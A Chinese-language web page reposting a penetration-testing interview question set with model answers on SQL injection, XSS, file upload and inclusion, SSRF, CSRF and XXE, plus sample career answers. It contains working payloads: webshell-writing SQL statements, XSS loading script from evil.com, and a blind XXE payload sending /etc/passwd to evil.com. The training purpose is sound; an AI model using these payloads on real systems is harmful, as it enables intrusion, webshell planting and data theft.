2025年渗透测试面试题总结-59(题目+回答)

安全领域各种资源,学习文档,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具,欢迎关注。

目录

一、SQL注入全解

二、XSS与文件漏洞

三、服务端漏洞专题

四、职业经验与能力评估

1、注入攻击原理是什么?如何找注入点?如何判断注入点?
2、注入分为几类及提交方式是什么
3、注入攻击一般所支持的类型有那些
4、mysql数据库帐号和密码存放在那个库和表里面
5、如何寻找网站物理路径
6、分别写出mysql及mssql数据库写入webshell的方法
7、请说出mysql5.0以下与5.0以上的区别
8、sql注入对服务器文件读写操作需要那些条件
9、分别说出sqlmap -u -r -v -p —level —risk —tables —coiumns -T —tamper参数的含义
10、注入漏洞防范方法
11、xss攻击原理及出现的原因
12、xss分为那几类
13、xss的危害,可能存在的地方
14、xss漏洞测试方法
15、xss如何绕过安全防范
16、分别说出iis、apache、nginx解析漏洞原理
17、任意文件下载攻击原理及测试方法
18、任意文件上传漏洞分几类,说出每类突破方法
19、分别文件包含漏洞攻击原理及分类
20、如何快速挖包涵漏洞
21、包涵漏洞具体能做什么,怎么绕过你能说说吗
22、ssrf漏洞攻击原理、用途
23、说说你是如何挖掘ssrf漏洞
24、说说ssrf绕过及防范方法
25、csrf攻击原理是什么及一般你用什么工具进行检测
26、你是如何挖掘ssrf漏洞的及防范方法
27、说说xxe漏洞攻击原理是什么,如何找xxe漏洞及攻击方法
28、xxe攻击在无回显的时候你是如何突破的
29、你是如何防范xxe漏洞的
30、你挖洞影像最深的是什么?
31、你认为你的渗透水平在国内大概是什么水平,能给自己打多少分
32、说说你以前在你公司主要做什么安全工作?如每天、每月、每年做些什么安全工作
33、你在各大漏洞平台挖过漏洞吗,能说说吗?
34、你写过什么好的安全漏洞文章发布过吗,是否可以说说?

一、SQL注入全解

1. 注入原理与检测mermaid

graph LR A[用户输入] --> B[拼接入SQL语句] --> C[数据库执行恶意指令] --> D[数据泄露/系统控制]
  • 找注入点:表单参数、URL参数、HTTP头(Cookie/User-Agent)
  • 判断方法
    • 单引号触发报错(' → 500错误)
    • 逻辑测试(id=1' and '1'='1 vs id=1' and '1'='2
    • 时间盲注(id=1; select sleep(5)--

2. 注入类型与提交方式

类型提交方式案例
联合查询注入GET/POST参数union select 1,@@version,3
报错注入Cookie头' and updatexml(1,concat(0x7e,version()),1)--
布尔盲注JSON Bodyadmin' and substr(database(),1,1)='a'--
时间盲注XML数据if(ascii(substr(user(),1,1))=114,sleep(3),0)

3. 支持的数据类型

  • 整型(id=1)、字符串(name='admin')、搜索型(%input%)、JSON/XML

4. MySQL凭据存储位置

sql-- MySQL 5.7+ SELECT user,authentication_string FROM mysql.user; -- MySQL <5.7 SELECT user,password FROM mysql.user; 

5. 网站物理路径获取

  • 报错信息(PHP错误日志)
  • 文件读取漏洞(/proc/self/environ
  • 数据库函数(@@datadir
  • 配置文件泄露(WEB-INF/web.xml

6. 数据库写Webshell方法

sql/* MySQL(需FILE权限)*/ SELECT '<?php @eval($_POST[cmd]);?>' INTO OUTFILE '/var/www/shell.php'; /* MSSQL(需db_owner权限)*/ EXEC sp_makewebtask 'C:\inetpub\shell.asp', '<?% execute(request("cmd")) %>';

7. MySQL 5.0关键区别

特性5.0以下5.0以上
系统表无information_schema内置元数据表
盲注效率依赖暴力猜解可直接查询表结构
函数支持受限丰富(如group_concat)

8. 文件读写条件

  • 数据库配置
    • MySQL:secure_file_priv=空值
    • MSSQL:启用xp_cmdshell
  • 权限:数据库用户需具备FILE权限(MySQL)或db_owner(MSSQL)
  • 路径:绝对路径且Web目录可写

9. SQLMap核心参数

bash-u "url" # 目标URL -r request.txt # 从文件加载HTTP请求 -v 3 # 显示完整payload(0-6级别) -p "id" # 指定测试参数 --level 2 # 检测深度(1-5,影响Cookie/XFF检测) --risk 3 # 风险等级(1-3,3会触发OR注入) --tables # 列出所有表 --columns -T users # 列出指定表字段 --tamper "space2comment" # 绕过WAF的脚本

10. 注入防御方案

  • 参数化查询(PreparedStatement)
  • 输入过滤(正则匹配:/[^a-z0-9]/i
  • 最小权限原则(禁用DB_FILE权限)
  • WAF规则(过滤union|select|sleep

二、XSS与文件漏洞

11. XSS原理与成因

mermaidgraph LR 用户输入 --> 未过滤插入页面 --> 浏览器执行JS代码 --> 劫持会话/钓鱼 
  • 根本原因:未对<>'"&等字符转义

12. XSS分类

类型触发场景案例
反射型URL参数直接输出http://site?search=<script>alert(1)</script>
存储型数据库存储后渲染留言板插入恶意脚本
DOM型前端JS操作DOMdocument.write(location.hash)

13. XSS危害与常见位置

  • 危害:Cookie窃取、键盘记录、钓鱼跳转、内网探测
  • 高发点:搜索框、评论区、用户资料页、HTTP头输出点

14. 测试方法

  • 基础探测:<script>alert(1)</script>
  • 事件触发:<img src=x onerror=alert(document.cookie)>
  • 外部加载:<script src=//evil.com/xss.js></script>

15. 绕过技巧

  • Unicode编码:\u003cscript\u003e
  • 标签属性分割:<img """><script>alert(1)</script>
  • 利用协议:javascript:eval(alert(1))
  • SVG向量:<svg onload=alert(1)>

16. 服务器解析漏洞

服务器漏洞原理利用方式
IIS 6.0分号截断(*.asp;.jpg上传恶意图片马
Apache多后缀解析(file.php.jpg配置错误导致双后缀
NginxCVE-2013-4547(a.jpg\0.php空字节截断

17. 任意文件下载

  • 原理:未校验文件路径参数(如download.jsp?file=../../etc/passwd
  • 测试
    1. 遍历路径(....//编码绕过)
    2. 读取系统文件(/proc/self/cmdline

18. 文件上传突破方法

防御方式绕过技巧
扩展名黑名单.php5 .phtml .htaccess
MIME类型检测修改Content-Type为image/jpeg
文件头检查添加GIF头(GIF89a;
内容过滤短标签(<?=)或JS混淆

19. 文件包含漏洞

  • 原理include($_GET['file']); 未限制路径
  • 分类
    • LFI(本地包含):包含系统文件
    • RFI(远程包含):加载远程恶意脚本(需allow_url_include=On

20. 快速挖掘技巧

  • 参数特征:?page=about.php
  • 日志包含:file=/var/log/apache2/access.log
  • PHP伪协议:php://filter/convert.base64-encode/resource=index.php

21. 包含漏洞利用与绕过

  • 能做什么
    • 读取源码(php://filter
    • 执行代码(包含图片马)
    • 日志污染(User-Agent插入PHP代码)
  • 绕过
    • 路径截断(/etc/passwd%00
    • 超长路径(./././[...]/file

三、服务端漏洞专题

22. SSRF原理与用途

mermaidgraph TB 攻击者 --> 诱使服务器请求内网资源 --> 探测内网拓扑 --> 攻击Redis/数据库
  • 用途
    • 内网端口扫描(http://192.168.1.1:3306
    • 云元数据窃取(169.254.169.254
    • 攻击内网应用(Redis未授权访问)

23. 漏洞挖掘方法

  • 参数特征:url=http://example.com
  • 协议探测:file:///etc/passwd gopher://
  • 重定向链:短链接→内网IP

24. SSRF绕过与防御

  • 绕过
    • 域名重绑定(DNS TTL=0)
    • IPv6地址([::ffff:127.0.0.1]
    • URL编码(0x7f000001 = 127.0.0.1)
  • 防御
    • 禁用非常用协议(file/gopher)
    • 设置请求白名单

25. CSRF原理与工具

  • 原理:诱导用户点击恶意链接触发敏感操作(如修改密码)
  • 工具
    • Burp Suite → Generate CSRF PoC
    • CSRFTester(自动化检测)

26. CSRF防御

  • Token验证:表单添加随机Token
  • SameSite Cookie:设置StrictLax
  • 二次验证:关键操作需密码确认

27. XXE漏洞攻防

  • 原理:解析恶意XML实体(<!ENTITY xxe SYSTEM "file:///etc/passwd">
  • 检测
    • 修改Content-Type为application/xml
    • 插入测试实体(&xxe;
  • 攻击
    • 文件读取(SYSTEM "file://"
    • 内网探测(http://192.168.1.1

28. 无回显XXE突破

xml<!ENTITY % payload SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd"> <!ENTITY % int "<!ENTITY % trick SYSTEM 'http://evil.com/?data=%payload;'>"> 
  • 通过DNS或HTTP请求外带数据

29. XXE防御

  • 禁用DTD(libxml_disable_entity_loader(true);
  • 使用JSON替代XML
  • 过滤<!ENTITY关键词

四、职业经验与能力评估

30. 印象最深漏洞案例

某银行系统逻辑漏洞:转账接口未校验双方账户关系,通过遍历参数实现任意账户互转,漏洞评级严重(SRC TOP10)

31. 渗透水平自评

国内中高级水平(75/100)

  • 优势:熟练掌握漏洞链组合利用(如SSRF→Redis→RCE)
  • 不足:二进制漏洞挖掘能力待提升

32. 日常工作内容

周期工作重点
每日漏洞扫描、日志审计、应急响应
每月渗透测试报告、安全加固方案
每年红蓝对抗演练、安全架构升级

33. 漏洞平台经历

  • 提交平台:补天、HackerOne、企业SRC
  • 成果:累计提交高危漏洞32个(含3个严重级)

34. 技术文章输出

《基于流量特征的WAF绕过实战》

  • 发布平台:FreeBuf、安全客
  • 核心内容:
    1. 分块传输绕过
    2. 注释符混淆SQL语句
    3. HTTP参数污染技巧

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。
如若转载,请注明出处:http://www.pswp.cn/pingmian/95878.shtml
繁体地址,请注明出处:http://hk.pswp.cn/pingmian/95878.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

GPT系列--类GPT2源码剖析

无需多言&#xff0c;大家应该都用过了&#xff0c;如今都更新到GPT-5了。1. GPT-1回到2018年的NLP&#xff0c;神仙打架&#xff0c;BERT与GPT不分先后。GPT是“Generative Pre-Training”的简称&#xff0c;生成式的预训练。BERT和GPT肯定是GPT难训练&#xff0c;引用量也是B…

这是一款没有任何限制的免费远程手机控制手机的软件

这是一款没有任何限制的免费远程手机控制手机的软件支持安卓和苹果1.安装1.1被控制端安装airdroid1.2控制端air mirror2.登录账号控制端和被控制端登录同一个账号3.控制打开控制端软件选择要控制的机器直接点“远程控制“

Observability:更智能的告警来了:更快的分诊、更清晰的分组和可操作的指导

作者&#xff1a;来自 Elastic Drew Post 探索 Elastic Stack 告警的最新增强功能&#xff0c;包括改进的相关告警分组、将仪表盘链接到告警规则&#xff0c;以及将调查指南嵌入到告警中。 在 9.1 版本中&#xff0c;我们对告警进行了重大升级&#xff0c;帮助 SRE 和运维人员更…

数智之光燃盛景 共同富裕创丰饶

8月29日&#xff0c;2025数博会“一带一路”国际大数据产业发展暨数智赋能新时代、共同富裕向未来的会议在贵阳国际生态会议中心隆重举行。作为全球大数据领域的重要盛会&#xff0c;此次活动吸引了来自联合国机构、国际组织、科研院所、知名企业等社会各界的百余位代表&#x…

【网络编程】recv函数的本质是什么?

一、为什么说recv函数的本质是 “copy”&#xff1f; recv是用于从网络连接&#xff08;或其他 IO 对象&#xff09;接收数据的函数&#xff0c;它的核心动作不是 “从网络上拉取数据”&#xff0c;而是 “把已经到达内核缓冲区的数据复制到用户程序的缓冲区”。 具体流程拆解&…

JSP程序设计之输入/输出对象 — out对象

目录1、out对象概述2.实例&#xff1a;out对象方法运用输入/输出对象&#xff0c;可以控制页面的输入和输出&#xff0c;用于访问与所有请求和响应有关的数据&#xff0c;包括out、request和response对象。 1、out对象概述 out对象是JspWriter类的一个实例&#xff0c;是一个…

UE里为什么要有提升变量

1、为了简洁当一个类里面的函数比较多&#xff0c;并且使用比较频繁的时候&#xff0c;就要不断的从这个类节点往外拉线&#xff0c;从而获取不同的函数节点&#xff0c;这样的蓝图就会看起来比较乱&#xff0c;这时候&#xff0c;就可以将这个常用的类提升为变量。2、为了存储…

玩转物联网只需十行代码,可它为何悄悄停止维护

文章目录玩转物联网只需十行代码&#xff0c;可它为何悄悄停止维护1 背景&#xff1a;MQTT 遇上 asyncio&#xff0c;为什么选 hbmqtt&#xff1f;2 hbmqtt 是什么&#xff1f;3 安装&#xff1a;一行命令&#xff0c;但别装最新4 五大核心 API&#xff1a;10 行代码跑通发布订…

从零开始学大模型之预训练语言模型

预训练语言模型 本文较长&#xff0c;建议点赞收藏&#xff0c;以免遗失。更多AI大模型开发 学习视频/籽料/面试题 都在这>>Github<< >>Gitee<< 3.1 Encoder-only PLM 在上一章&#xff0c;我们详细讲解了给 NLP 领域带来巨大变革注意力机制以及使用…

JMeter接口测试全流程解析

1. Jmeter的界面介绍和功能组件&#xff08;元件&#xff09;1、测试计划&#xff1a;Jmeter的起点和容器2、线程组&#xff1a;代表一定的虚拟用户&#xff08;一个用户一个线程&#xff09;3、取样器&#xff1a;发送请求的最小单元4、逻辑控制器&#xff1a;控制组件的执行顺…

Effective Modern C++ 条款26:避免在通用引用上重载

在C编程中&#xff0c;函数重载是一项强大的特性&#xff0c;它允许我们为不同的参数类型提供不同的实现。然而&#xff0c;当涉及到通用引用&#xff08;universal references&#xff09;时&#xff0c;重载可能会带来意想不到的问题。Effective Modern C的条款26明确指出&am…

OpenLayers数据源集成 -- 章节一:图像图层详解

前言在前面的文章中&#xff0c;我们学习了OpenLayers的基础控件操作。本文将深入探讨OpenLayers中的图像图层&#xff08;ImageLayer&#xff09;功能&#xff0c;通过一个完整的示例来展示如何使用ImageArcGISRest数据源加载ArcGIS服务&#xff0c;并详细解释图层配置、事件监…

通义万相wan2.2 Fun系列--Camera镜头控制与lnp首尾帧视频模型

上节内容讲解了wan2.2 fun control本节内容对wan2.2 fun系列模型的camera镜头控制模型与lnp首尾帧视频模型进行测试与讲解。 Wan2.2-Fun-Camera-Control是阿里基于Wan2.2框架推出的图生视频运镜控制模型 。它支持512、768、1024等多分辨率的视频预测&#xff0c;以81帧、每秒16…

JavaSE 集合从入门到面试:全面解析与实战指南

JavaSE 集合从入门到面试&#xff1a;全面解析与实战指南 在 Java 编程中&#xff0c;集合是处理数据的核心工具&#xff0c;几乎所有 Java 应用都会用到集合框架。从简单的列表存储到复杂的数据分析&#xff0c;集合框架提供了丰富的数据结构和操作方法。本文将从基础概念到面…

自建云音乐服务器:Navidrome+cpolar让无损音乐随身听

文章目录前言1. 安装Docker2. 创建并启动Navidrome容器3. 公网远程访问本地Navidrome3.1 内网穿透工具安装3.2 创建远程连接公网地址3.3 使用固定公网地址远程访问前言 “想听自己的无损音乐还要开会员&#xff1f;”——音乐发烧友小王的烦恼。商业音乐平台音质压缩&#xff…

C3P0连接池适配HGDB

文章目录文档用途详细信息文档用途 讲解常用的并且需要与数据库进行交互的开源框架C3P0&#xff0c;以及C3P0框架是如何适配HGDB的。 详细信息 1.C3P0概述 C3P0是一个开源的JDBC连接池&#xff0c;它实现了数据源和JNDI绑定&#xff0c;支持JDBC3规范和JDBC2的标准扩展。目…

ZeroGPU Spaces 加速实践:PyTorch 提前编译全解析

ZeroGPU 让任何人都能在 Hugging Face Spaces 中使用强大的 Nvidia H200 硬件&#xff0c;而不需要因为空闲流量而长期占用 GPU。 它高效、灵活&#xff0c;非常适合演示&#xff0c;不过需要注意的是&#xff0c;ZeroGPU 并不能在所有场景下完全发挥 GPU 与 CUDA 栈的全部潜能…

8.ImGui-输入框

免责声明&#xff1a;内容仅供学习参考&#xff0c;请合法利用知识&#xff0c;禁止进行违法犯罪活动&#xff01; 本次游戏没法给 内容参考于&#xff1a;微尘网络安全 上一个内容&#xff1a;7.ImGui-单选框和复选框 单行输入框使用 ImGui::InputText()&#xff0c;下图中…

2025年- H120-Lc28. 找出字符串中第一个匹配项的下标(数组)--Java版

1.题目2.思路 短的子串相对不变 所以我们用长的字符串去截取in个长度的子串做遍历 如果两者相等 返回字符串第一个匹配项的索引的下标 3.代码实现 class Solution {public int strStr(String haystack, String needle) {int s1haystack.length();int s2needle.length();//遍历最…

uport1100系列转接头,SZ系列光电编码器RS485通信

安装uport1100系列转接头驱动 &#xff1a;选择对应自己系统内核版本的驱动。否则爆出系统内核过高过低等问题。 查看系统内核版本指令&#xff1a; uname -r #简要 uname -a #详细驱动下载官网&#xff1a; https://www.moxa.com.cn/support/product-support/software-and-…